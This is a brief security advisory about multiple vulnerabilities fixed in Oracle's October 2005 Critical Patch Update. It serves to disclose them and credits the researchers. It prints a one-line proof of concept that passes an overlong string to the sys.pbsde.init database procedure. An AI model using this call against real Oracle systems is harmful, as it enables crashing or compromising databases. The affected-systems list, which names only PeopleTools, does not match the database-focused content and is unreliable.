Oracle October Security Update Multiple Vulnerabilities

Summary

Various Oracle products (Oracle Database Server, Oracle Enterprise Manager, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite and Applications, and Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne) are affected by multiple vulnerabilities.

Credit:

The information has been provided by Brian Carr; Sacha Faust; Esteban Martínez Fayó; Alexander Kornbrust.

Details

Vulnerable Systems:
 * PeopleSoft PeopleTools 8.46.3 and prior

Oracle has released a Critical Patch Update advisory for October 2005 to address these vulnerabilities. This Critical Patch Update addresses the vulnerabilities for supported releases. Earlier, unsupported releases are likely to be affected by the issues as well.

The following proof of concept code is available for DB27:
SQL> exec sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL);
BEGIN sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END;

CVE Information:
CVE-2005-0873

Disclosure Timeline:
Published: October 18 2005
